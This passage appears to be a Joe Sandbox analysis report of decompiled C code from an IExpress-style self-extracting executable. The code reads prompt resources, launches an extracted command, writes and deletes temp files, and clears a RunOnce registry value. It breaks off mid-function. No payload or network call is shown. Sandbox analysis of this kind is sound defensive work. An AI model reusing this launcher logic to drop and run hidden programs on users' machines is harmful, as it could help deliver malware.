                                                                                                                                                                                                        • Instruction ID: a794d76569405fb05a42cc706b24e1b98423727f64aff5cf645411770dffdb31
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cbfd7621bd0ba92c0c3fa1fcf7a0b3c30e388d4382cfba01401da0cd764c79b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE1126717006146BE7241F7A5C0DF9F7E99EF8A364B100659F506D31C2CA74A84582A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 675 c3fef-c4010 676 c410a-c411a call c6ce0 675->676 677 c4016-c403b CreateProcessA 675->677 678 c40c4-c4101 call c6285 GetLastError FormatMessageA call c44b9 677->678 679 c4041-c406e WaitForSingleObject GetExitCodeProcess 677->679 694 c4106 678->694 681 c4070-c4077 679->681 682 c4091 call c411b 679->682 681->682 685 c4079-c407b 681->685 689 c4096-c40b8 CloseHandle * 2 682->689 685->682 688 c407d-c4089 685->688 688->682 691 c408b 688->691 692 c4108 689->692 693 c40ba-c40c0 689->693 691->682 692->676 693->692 695 c40c2 693->695 694->692 695->694
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E000C3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                        				long _v528;
                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t20;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t45 = __edx;
                                                                                                                                                                                                        				_t20 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                        				_t39 = __ecx;
                                                                                                                                                                                                        				_t49 = 1;
                                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                                        				if(__ecx == 0) {
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return E000C6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                                                        					 *0xc9124 = E000C6285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                        					_t45 = 0x4c4;
                                                                                                                                                                                                        					E000C44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					_t49 = 0;
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t22 = _t49;
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                        				_t44 = _v528;
                                                                                                                                                                                                        				_t53 =  *0xc8a28; // 0x0
                                                                                                                                                                                                        				if(_t53 == 0) {
                                                                                                                                                                                                        					_t34 =  *0xc9a2c; // 0x0
                                                                                                                                                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                        						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                        							 *0xc9a2c = _t44;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E000C411B(_t34, _t44);
                                                                                                                                                                                                        				CloseHandle(_v544.hThread);
                                                                                                                                                                                                        				CloseHandle(_v544);
                                                                                                                                                                                                        				if(( *0xc9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE ref: 000C4033
                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C4049
                                                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 000C405C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 000C409C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 000C40A8
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 000C40DC
                                                                                                                                                                                                        • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 000C40E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3183975587-0
                                                                                                                                                                                                        • Opcode ID: 6876d4b24a26d12a0223a637c9f42b3dd821a4f716260d3d401d3a6082afa2ef
                                                                                                                                                                                                        • Instruction ID: fced0a1771ea3048286b50c7521faff7da91d0001308c7aaade71a1c32d99208
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6876d4b24a26d12a0223a637c9f42b3dd821a4f716260d3d401d3a6082afa2ef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4231BC31640218ABFB609B65DC4DFAF77B8FB95704F2001ADFA45D21A2CA388D81CB61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C51E5(void* __eflags) {
                                                                                                                                                                                                        				int _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = E000C468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                                                        					if(E000C468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                        						if(_t5 != 0) {
                                                                                                                                                                                                        							_t6 = E000C44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                        							LocalFree(_t28);
                                                                                                                                                                                                        							if(_t6 != 6) {
                                                                                                                                                                                                        								 *0xc9124 = 0x800704c7;
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *0xc9124 = 0;
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t28);
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E000C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree(_t28);
                                                                                                                                                                                                        					 *0xc9124 = 0x80070714;
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E000C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xc9124 = E000C6285();
                                                                                                                                                                                                        				goto L10;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                          • Part of subcall function 000C468F: SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                          • Part of subcall function 000C468F: LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                          • Part of subcall function 000C468F: LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                          • Part of subcall function 000C468F: memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                          • Part of subcall function 000C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,000C2F4D,?,00000002,00000000), ref: 000C5201
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 000C5250
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                          • Part of subcall function 000C6285: GetLastError.KERNEL32(000C5BBC), ref: 000C6285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$UPROMPT
                                                                                                                                                                                                        • API String ID: 957408736-2980973527
                                                                                                                                                                                                        • Opcode ID: 42995ed482f6091ffa6c8f2751f535694c4c66ce8a3839516fd4b8a8dbd1e1a2
                                                                                                                                                                                                        • Instruction ID: 81f3beea2cfe8faae3e5f01b308fdee783332c705bb047d29746ebab7897305d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42995ed482f6091ffa6c8f2751f535694c4c66ce8a3839516fd4b8a8dbd1e1a2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E11E2B9700A05ABF3246B719C5AF7F71DDEB8A385B20402DBA02D61D1DA7DDC005225
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E000C52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR** _t31;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 = __edi;
                                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                                        				_t21 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_t31 =  *0xc91e0; // 0x27a8eb8
                                                                                                                                                                                                        				if(_t31 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t29 = _t31;
                                                                                                                                                                                                        						if( *0xc8a24 == 0 &&  *0xc9a30 == 0) {
                                                                                                                                                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                        							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t31 = _t31[1];
                                                                                                                                                                                                        						LocalFree( *_t29);
                                                                                                                                                                                                        						LocalFree(_t29);
                                                                                                                                                                                                        					} while (_t31 != 0);
                                                                                                                                                                                                        					_pop(_t28);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 =  *0xc8a20; // 0x0
                                                                                                                                                                                                        				_pop(_t32);
                                                                                                                                                                                                        				if(_t11 != 0 &&  *0xc8a24 == 0 &&  *0xc9a30 == 0) {
                                                                                                                                                                                                        					_push(_t22);
                                                                                                                                                                                                        					E000C1781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                        					if(( *0xc9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                        						E000C65E8( &_v268);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                        					_t22 =  &_v268;
                                                                                                                                                                                                        					E000C2390( &_v268);
                                                                                                                                                                                                        					_t11 =  *0xc8a20; // 0x0
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *0xc9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                        					_t11 = E000C1FE1(_t22); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *0xc8a20 =  *0xc8a20 & 0x00000000;
                                                                                                                                                                                                        				return E000C6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(027A8EB8,00000080,?,00000000), ref: 000C52F2
                                                                                                                                                                                                        • DeleteFileA.KERNELBASE(027A8EB8), ref: 000C52FA
                                                                                                                                                                                                        • LocalFree.KERNEL32(027A8EB8,?,00000000), ref: 000C5305
                                                                                                                                                                                                        • LocalFree.KERNEL32(027A8EB8), ref: 000C530C
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(000C11FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 000C5363
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000C5334
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                        • API String ID: 2833751637-3647970563
                                                                                                                                                                                                        • Opcode ID: b2e585b5324459ae1869037962b6f3bd2b04444a8967c1bc2e9eebb2249af046
                                                                                                                                                                                                        • Instruction ID: 03fb4b12e2cdfe62446ccda09269e045e98d32bf4ed8acf300e37a0d87c62a69
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2e585b5324459ae1869037962b6f3bd2b04444a8967c1bc2e9eebb2249af046
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C121BE35500A08DFFB609B20DD09FAD37E0BB05385F14011DE846561A1CBB9AEC4CB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C1FE1(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				if( *0xc8530 != 0) {
                                                                                                                                                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                        					if(_t4 == 0) {
                                                                                                                                                                                                        						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                                                                                                                                                        						return RegCloseKey(_v8);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,000C538C,?,?,000C538C), ref: 000C2005
                                                                                                                                                                                                        • RegDeleteValueA.KERNELBASE(000C538C,wextract_cleanup1,?,?,000C538C), ref: 000C2017
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(000C538C,?,?,000C538C), ref: 000C2020
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                        • API String ID: 849931509-1592051331
                                                                                                                                                                                                        • Opcode ID: 85e5ba97fc579779115715857a0a73f5e2b2f4cc985a2bbbb151a9014e2d6c73
                                                                                                                                                                                                        • Instruction ID: e6b441e5d6bf813d8b5a97e3172fe56e07c05bce55af069d3e48d637a4400a10
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85e5ba97fc579779115715857a0a73f5e2b2f4cc985a2bbbb151a9014e2d6c73
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCE04F30650718FBEB218B90EC0EF5D7B69F7017C4F300199BA04A0072EBA55A14D709
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E000C4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				long _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				long _t35;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				struct HWND__* _t37;
                                                                                                                                                                                                        				long _t38;
                                                                                                                                                                                                        				long _t39;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				long _t44;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				long _t46;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				long _t51;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				long _t59;
                                                                                                                                                                                                        				char* _t63;
                                                                                                                                                                                                        				long _t64;
                                                                                                                                                                                                        				CHAR* _t71;
                                                                                                                                                                                                        				CHAR* _t74;
                                                                                                                                                                                                        				int _t75;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                        				_v8 = _t30;
                                                                                                                                                                                                        				_t75 = _a8;
                                                                                                                                                                                                        				if( *0xc91d8 == 0) {
                                                                                                                                                                                                        					_t32 = _a4;
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 == 0) {
                                                                                                                                                                                                        						_t33 = E000C4E99(_t75);
                                                                                                                                                                                                        						L35:
                                                                                                                                                                                                        						return E000C6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t35 = _t32 - 1;
                                                                                                                                                                                                        					__eflags = _t35;
                                                                                                                                                                                                        					if(_t35 == 0) {
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						_t33 = 0;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t36 = _t35 - 1;
                                                                                                                                                                                                        					__eflags = _t36;
                                                                                                                                                                                                        					if(_t36 == 0) {
                                                                                                                                                                                                        						_t37 =  *0xc8584; // 0x0
                                                                                                                                                                                                        						__eflags = _t37;
                                                                                                                                                                                                        						if(_t37 != 0) {
                                                                                                                                                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t54 = 0xc91e4;
                                                                                                                                                                                                        						_t58 = 0xc91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t38 =  *_t58;
                                                                                                                                                                                                        							_t58 =  &(_t58[1]);
                                                                                                                                                                                                        							__eflags = _t38;
                                                                                                                                                                                                        						} while (_t38 != 0);
                                                                                                                                                                                                        						_t59 = _t58 - 0xc91e5;
                                                                                                                                                                                                        						__eflags = _t59;
                                                                                                                                                                                                        						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t73 =  &(_t71[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t39 =  *_t71;
                                                                                                                                                                                                        							_t71 =  &(_t71[1]);
                                                                                                                                                                                                        							__eflags = _t39;
                                                                                                                                                                                                        						} while (_t39 != 0);
                                                                                                                                                                                                        						_t69 = _t71 - _t73;
                                                                                                                                                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							L3:
                                                                                                                                                                                                        							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xc91e4;
                                                                                                                                                                                                        						_t30 = E000C4702( &_v268, 0xc91e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t41 = E000C476D( &_v268, __eflags);
                                                                                                                                                                                                        						__eflags = _t41;
                                                                                                                                                                                                        						if(_t41 == 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0x180);
                                                                                                                                                                                                        						_t30 = E000C4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                        						_t75 = _t30;
                                                                                                                                                                                                        						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                        						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E000C47E0( &_v268);
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xc93f4 =  *0xc93f4 + 1;
                                                                                                                                                                                                        						_t33 = _t75;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t44 = _t36 - 1;
                                                                                                                                                                                                        					__eflags = _t44;
                                                                                                                                                                                                        					if(_t44 == 0) {
                                                                                                                                                                                                        						_t54 = 0xc91e4;
                                                                                                                                                                                                        						_t63 = 0xc91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t45 =  *_t63;
                                                                                                                                                                                                        							_t63 =  &(_t63[1]);
                                                                                                                                                                                                        							__eflags = _t45;
                                                                                                                                                                                                        						} while (_t45 != 0);
                                                                                                                                                                                                        						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t64 = _t63 - 0xc91e5;
                                                                                                                                                                                                        						__eflags = _t64;
                                                                                                                                                                                                        						_t69 =  &(_t74[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t46 =  *_t74;
                                                                                                                                                                                                        							_t74 =  &(_t74[1]);
                                                                                                                                                                                                        							__eflags = _t46;
                                                                                                                                                                                                        						} while (_t46 != 0);
                                                                                                                                                                                                        						_t73 = _t74 - _t69;
                                                                                                                                                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xc91e4;
                                                                                                                                                                                                        						_t30 = E000C4702( &_v268, 0xc91e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                        						_t30 = E000C4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E000C4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                        						__eflags = _t50;
                                                                                                                                                                                                        						if(_t50 != 0) {
                                                                                                                                                                                                        							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                        							__eflags = _t51;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t51 = 0x80;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t33 = 1;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t30 = _t44 - 1;
                                                                                                                                                                                                        					__eflags = _t30;
                                                                                                                                                                                                        					if(_t30 == 0) {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a4 == 3) {
